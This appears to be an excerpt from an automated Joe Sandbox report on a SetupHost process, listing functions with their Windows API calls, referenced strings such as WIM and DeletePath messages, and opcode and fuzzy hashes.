                                                                                                                                                                                                                  • Part of subcall function 009FB408: GetProcessHeap.KERNEL32(00000000,002BD1E0,00000000,?,?,009E85C8,?,?,?,00000000,009E71FB), ref: 009FB417
                                                                                                                                                                                                                  • Part of subcall function 009FB408: HeapAlloc.KERNEL32(00000000,?,?,009E85C8,?,?,?,00000000,009E71FB), ref: 009FB41E
                                                                                                                                                                                                                  • Part of subcall function 009FB408: memset.MSVCRT ref: 009FB434
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Error$Heap$Last$AllocProcessStatus$memset
                                                                                                                                                                                                                • String ID: InitLZMSCompression
                                                                                                                                                                                                                • API String ID: 1753330309-3769770710
                                                                                                                                                                                                                • Opcode ID: 95b1a786069a143363d5cb98504a45c0c309af31fe29d22d4a408f9481a76ce1
                                                                                                                                                                                                                • Instruction ID: 4b0514046add67fdf2882700d9c45c001670dcf27dcea308cad29e0ebacca5c9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 95b1a786069a143363d5cb98504a45c0c309af31fe29d22d4a408f9481a76ce1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A711E4B7A047B26BD33357E7AD0CBAF2968AB44B60F014615F90DE7250DE28CC0196E8
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000,00000000,009E0605,00000000,00000000,00000000,009DDF5C,00000000,00000000,00000000,?,00000000,00000000), ref: 009E26D7
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,009DE358,?,?,00000000), ref: 009E26DE
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,000000F9,00000000,?,00000000,00000000,009DE358,?,?,00000000), ref: 009E270E
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 009E2715
                                                                                                                                                                                                                • RtlNtStatusToDosError.NTDLL ref: 009E2724
                                                                                                                                                                                                                • RtlNtStatusToDosError.NTDLL ref: 009E2732
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000057,00000000,00000000,00000000,009E0605,00000000,00000000,00000000,009DDF5C,00000000,00000000,00000000,?,00000000,00000000,009DE358), ref: 009E2759
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Error$ProcessStatus$AllocFreeLast
                                                                                                                                                                                                                • String ID: WimStrDupe
                                                                                                                                                                                                                • API String ID: 1546159109-1448866160
                                                                                                                                                                                                                • Opcode ID: e51a1b8884251377ece50258632146df286604c67b8c4361ee0977bf99d1dc3c
                                                                                                                                                                                                                • Instruction ID: 9bfce76c99a1a033b3776acfa66f2ee8f4fdc4f6192014dab87d4d96f352324a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e51a1b8884251377ece50258632146df286604c67b8c4361ee0977bf99d1dc3c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E112B37A406615BC7229BE99C88BFFA62EEB84751B188135FA05D7258CA25DC0383E1
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,?,009DE5CA,?,00000000), ref: 009EB6D8
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32(?,?,00000000,?,?,009DE5CA,?,00000000), ref: 009EB6EC
                                                                                                                                                                                                                • RtlAcquireResourceShared.NTDLL ref: 009EB6FC
                                                                                                                                                                                                                • RtlReleaseResource.NTDLL(00A16750), ref: 009EB728
                                                                                                                                                                                                                • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,009DE5CA,?,00000000), ref: 009EB766
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,009DE5CA,?,00000000), ref: 009EB773
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009EB77A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorHeapLastResource$AcquireCurrentFreeProcessReleaseSharedThread
                                                                                                                                                                                                                • String ID: %s:(%d)
                                                                                                                                                                                                                • API String ID: 1007646212-2129470232
                                                                                                                                                                                                                • Opcode ID: 220118713f44445da3bb269df1ebca5f506ab92c2d607377b01371b72c3d8b29
                                                                                                                                                                                                                • Instruction ID: 760ec9e765a453a61cf7655cc067f4c9c986217d4fe9fdb9940bc43c45b82fd8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 220118713f44445da3bb269df1ebca5f506ab92c2d607377b01371b72c3d8b29
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8821D235A00208BBCB11AFE6DD89AEFBB7AEBC4751F118469F901E3650D7718D41CB90
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 009E37D6
                                                                                                                                                                                                                • GetFileInformationByHandle.KERNEL32(?,?,?,00000000,00000000), ref: 009E37E5
                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(?,00000000,00000001,00000000), ref: 009E38DC
                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?,00000008,0000000C,00000000,00000001,00000000), ref: 009E38FC
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?), ref: 009E3A16
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 009E3A1D
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,00000000,00000000,?,00000000,00000000), ref: 009E3A25
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 009E3A32
                                                                                                                                                                                                                  • Part of subcall function 009E4346: memcmp.MSVCRT ref: 009E4379
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000057,?,00000000,00000000), ref: 009E3A3E
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$CriticalHeapSection$EnterFileFreeHandleInformationLeaveProcessmemcmpmemset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1790922011-0
                                                                                                                                                                                                                • Opcode ID: 46b90c961fb9ab1d4e22a60c18511bd3796d12a3ac64faef4e88a484a5c14b7f
                                                                                                                                                                                                                • Instruction ID: 55a538fbf477e74ce5938dcdb5cd242cabb8cd6b4858c5fcf02189bb18321680
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 46b90c961fb9ab1d4e22a60c18511bd3796d12a3ac64faef4e88a484a5c14b7f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 81D12E70A00289DFDF26DFA6C948BAEBBF9BF48300F148529E455AB255D770ED46CB10
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000006,00000000,00000000,00000000,?,009DE028,?,00000000,00000000,009DE358,?,?,00000000), ref: 009DDC1E
                                                                                                                                                                                                                • LocalFree.KERNEL32(009DE028,?,00000000,00000000,00000000,?,009DE028,?,00000000,00000000,009DE358,?,?,00000000), ref: 009DDCAF
                                                                                                                                                                                                                • memset.MSVCRT ref: 009DDCDD
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorFreeLastLocalmemset
                                                                                                                                                                                                                • String ID: SaveOffset failed$UpdateWIMHeader failed$WIMCommitImageChanges
                                                                                                                                                                                                                • API String ID: 4085272283-4063391387
                                                                                                                                                                                                                • Opcode ID: 905cbf91bba0cb82bb5dfaa0370cef88bf565ee60a383b04bf49a06136a579f5
                                                                                                                                                                                                                • Instruction ID: 9c343c8b35a2e330034f4544b8cfd2bd90e40fca5736b65cb2b2bab5fb43e022
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 905cbf91bba0cb82bb5dfaa0370cef88bf565ee60a383b04bf49a06136a579f5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C681D531B81240ABDF16B7664946B7D626B6FD4704F09C46AF802AB3D2DF74CC02D691
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,0000001C,?,00000000,?,?,?,009E8E06,?,?,?,00000000,00000000,?,?,009E8CDB), ref: 009E8925
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,009E8E06,?,?,?,00000000,00000000,?,?,009E8CDB,?,00000000,00000000), ref: 009E892C
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000040,?,009E8E06,?,?,?,00000000,00000000,?,?,009E8CDB,?,00000000,00000000), ref: 009E897F
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,009E8E06,?,?,?,00000000,00000000,?,?,009E8CDB,?,00000000,00000000), ref: 009E8986
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,009E8E06,?,?,?,00000000,00000000,?,?,009E8CDB,?,00000000,00000000), ref: 009E8993
                                                                                                                                                                                                                • HeapReAlloc.KERNEL32(00000000,?,009E8E06,?,?,?,00000000,00000000,?,?,009E8CDB,?,00000000,00000000), ref: 009E899A
                                                                                                                                                                                                                  • Part of subcall function 009EB6C3: GetLastError.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,?,009DE5CA,?,00000000), ref: 009EB6D8
                                                                                                                                                                                                                  • Part of subcall function 009EB6C3: GetCurrentThreadId.KERNEL32(?,?,00000000,?,?,009DE5CA,?,00000000), ref: 009EB6EC
                                                                                                                                                                                                                  • Part of subcall function 009EB6C3: RtlAcquireResourceShared.NTDLL ref: 009EB6FC
                                                                                                                                                                                                                  • Part of subcall function 009EB6C3: RtlReleaseResource.NTDLL(00A16750), ref: 009EB728
                                                                                                                                                                                                                  • Part of subcall function 009EB6C3: SetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,009DE5CA,?,00000000), ref: 009EB766
                                                                                                                                                                                                                  • Part of subcall function 009EB6C3: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,009DE5CA,?,00000000), ref: 009EB773
                                                                                                                                                                                                                  • Part of subcall function 009EB6C3: HeapFree.KERNEL32(00000000), ref: 009EB77A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$Alloc$ErrorLastResource$AcquireCurrentFreeReleaseSharedThread
                                                                                                                                                                                                                • String ID: AllocChunkInfo
                                                                                                                                                                                                                • API String ID: 2448033581-2168644258
                                                                                                                                                                                                                • Opcode ID: 6867fbaab11142ffa2bfe5ffcbd10ebcb0c83d7ab49c3e04bb3229576013434e
                                                                                                                                                                                                                • Instruction ID: 1ed28cd28db0fa62ef255508d00905b95749e559eb7a7996c64c66b1025e7724
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6867fbaab11142ffa2bfe5ffcbd10ebcb0c83d7ab49c3e04bb3229576013434e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8F413631A407A1EBD7229BE6C844BBB76A9BF44760F10812AF90D9B2D1CF74DC008795
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000057,?,00000000,00000000,00000000,009DE497,?,00000000), ref: 009C08A0
                                                                                                                                                                                                                  • Part of subcall function 009BE2CF: GetFileAttributesW.KERNEL32(00000000,?,00000000,00000000,009C076D,?,00000000,00000000,00000000,009DE497,?,00000000), ref: 009BE2F1
                                                                                                                                                                                                                  • Part of subcall function 009BE2CF: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 009BE321
                                                                                                                                                                                                                  • Part of subcall function 009BE2CF: HeapFree.KERNEL32(00000000,?,00000000), ref: 009BE328
                                                                                                                                                                                                                  • Part of subcall function 009BE2CF: SetLastError.KERNEL32(00000000,?,00000000), ref: 009BE32F
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000000,00000000,009DE497,?,00000000), ref: 009C07C9
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000000,00000000,009DE497,?,00000000), ref: 009C07E6
                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8,?,?,?,00000000,00000000,00000000,009DE497,?,00000000), ref: 009C080A
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 009C087B
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • DeletePath: [%s] doesn't exist as a directory; nothing to delete., xrefs: 009C0772
                                                                                                                                                                                                                • DeletePath: Cannot delete <null>., xrefs: 009C0887
                                                                                                                                                                                                                • DeletePath: Failed to obliterate [%s] after %d tries; GLE = 0x%x, xrefs: 009C082F
                                                                                                                                                                                                                • DeletePath: Failed to obliterate [%s] (GLE = 0x%x); retrying..., xrefs: 009C07EE
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$Heap$AttributesFileFreeProcessSleep
                                                                                                                                                                                                                • String ID: DeletePath: Cannot delete <null>.$DeletePath: Failed to obliterate [%s] (GLE = 0x%x); retrying...$DeletePath: Failed to obliterate [%s] after %d tries; GLE = 0x%x$DeletePath: [%s] doesn't exist as a directory; nothing to delete.
                                                                                                                                                                                                                • API String ID: 687222072-3117722903
                                                                                                                                                                                                                • Opcode ID: 784c5a7b01193a2b90e2972953a792ddc8ff1b1826363f06a1a79c4f600de247
                                                                                                                                                                                                                • Instruction ID: eb0c0078b9544d619289082c10b8c097cf24edc740337cd9ddc343137143ad32
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 784c5a7b01193a2b90e2972953a792ddc8ff1b1826363f06a1a79c4f600de247
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BA311571E48301EBF724EBB98C46F6B329CEBC0B64F04C92DF54491181EAB5C9454AE7
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessPreferredUILanguages.KERNEL32(00000008,?,00000000,?,?), ref: 009B4105
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 009B4146
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 009B414D
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?), ref: 009B41CE
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009B41D5
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$AllocFreeLanguagesPreferred
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 579015856-0
                                                                                                                                                                                                                • Opcode ID: 412b7d740a057122862acd4d587824eccd5830b924daa5a3263f1f792664fff9
                                                                                                                                                                                                                • Instruction ID: 511f1c94bb3664cd2620855a2da3ff66d314c89556a013d37f091a4d830acde1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 412b7d740a057122862acd4d587824eccd5830b924daa5a3263f1f792664fff9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8931A576E04219ABCB11EBE48E44BEE77BDABD4760F204455F605D7281DE30DA02A7A0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000008,00A124C8,00000018,009ECF33,?,?,00000000,?,?,009E6ACD,?,?,?,?,?), ref: 009E56A0
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,009E6ACD,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009E56A7
                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000003,00000080,00000000), ref: 009E56FE
                                                                                                                                                                                                                • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 009E5713
                                                                                                                                                                                                                • SetEndOfFile.KERNEL32(00000000,?,009E6ACD,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009E571E
                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(00000000,?,009E6ACD,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009E5736
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 009E5764
                                                                                                                                                                                                                • CloseHandle.KERNEL32 ref: 009E5796
                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?,00A124C8,00000018,009ECF33,?,?,00000000,?,?,009E6ACD,?,?,?,?,?,?), ref: 009E57A1
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$CloseHandleHeap$AllocCreateCriticalDeleteEnterPointerProcessSection
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4199694395-0
                                                                                                                                                                                                                • Opcode ID: 411b46fd1756512ab7dfa7a59375ff08800831d6d8c7c3fd5b5bd05a552b3c1a
                                                                                                                                                                                                                • Instruction ID: 4d67ccd979b093b684660bdff2fca9b9ee4ed769d0376c13439616c9b20d28a5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 411b46fd1756512ab7dfa7a59375ff08800831d6d8c7c3fd5b5bd05a552b3c1a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D731FF31A01B90EBDB22DFB68C44BEE777DBF84714F164629E921672D0CB358C128760
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 009D834D: memset.MSVCRT ref: 009D8369
                                                                                                                                                                                                                  • Part of subcall function 009DB3AC: DbgPrintEx.NTDLL ref: 009DB3F2
                                                                                                                                                                                                                  • Part of subcall function 009DB3AC: RtlRaiseStatus.NTDLL(C0000420), ref: 009DB400
                                                                                                                                                                                                                  • Part of subcall function 009DA546: memset.MSVCRT ref: 009DA55F
                                                                                                                                                                                                                • memset.MSVCRT ref: 009DA376
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • RtlInitializeGrowingList( this, sizeof(TStoredObject), m_ulElementsPerChunk, (PVOID)m_InternalBuffer, sizeof(m_InternalBuffer), Allocator ), xrefs: 009DA354
                                                                                                                                                                                                                • ,, xrefs: 009DA28D
                                                                                                                                                                                                                • -, xrefs: 009DA34D
                                                                                                                                                                                                                • CRtlGrowingList<struct _XMLDOC_ATTRIBUTE,50,6>::Initialize, xrefs: 009DA346
                                                                                                                                                                                                                • onecore\base\xml\udom_xmlwalker.h, xrefs: 009DA2D2, 009DA33F
                                                                                                                                                                                                                • CXmlLogicalState::Initialize, xrefs: 009DA2D9
                                                                                                                                                                                                                • , xrefs: 009DA2B5
                                                                                                                                                                                                                • RtlXmlInitializeNextLogicalThing(this, &Init), xrefs: 009DA2E7
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset$PrintRaiseStatus
                                                                                                                                                                                                                • String ID: $,$-$CRtlGrowingList<struct _XMLDOC_ATTRIBUTE,50,6>::Initialize$CXmlLogicalState::Initialize$RtlInitializeGrowingList( this, sizeof(TStoredObject), m_ulElementsPerChunk, (PVOID)m_InternalBuffer, sizeof(m_InternalBuffer), Allocator )$RtlXmlInitializeNextLogicalThing(this, &Init)$onecore\base\xml\udom_xmlwalker.h
                                                                                                                                                                                                                • API String ID: 3387324805-1134685988
                                                                                                                                                                                                                • Opcode ID: 49ac5fcef7154bb09979c5c58d44e9929df0c2c66d19a24b100218fc5a4a39c5
                                                                                                                                                                                                                • Instruction ID: d666db749fbea5faab1ca0fbd81049f089934de5d63ec83671bf087af9a67f25
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 49ac5fcef7154bb09979c5c58d44e9929df0c2c66d19a24b100218fc5a4a39c5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5931E2B2940308AADB21DFA9D844FDFFBF5AF80314F11841AE415A7341DBB09609CB62
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,009ECA09), ref: 009EC505
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,009ECA09,?,?,?,?,?,?,?,?,?,009E5463,?,00000000), ref: 009EC50F
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000001,00000000,?,009ECA09,?,?,?,?,?,?,?,?,?,009E5463,?), ref: 009EC521
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,009ECA09,?,?,?,?,?,?,?,?,?,009E5463,?,00000000), ref: 009EC528
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,009ECA09,?,?,?,?,?,?,?,?,?,009E5463,?,00000000), ref: 009EC57A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorHeapLast$AllocByteCharMultiProcessWide
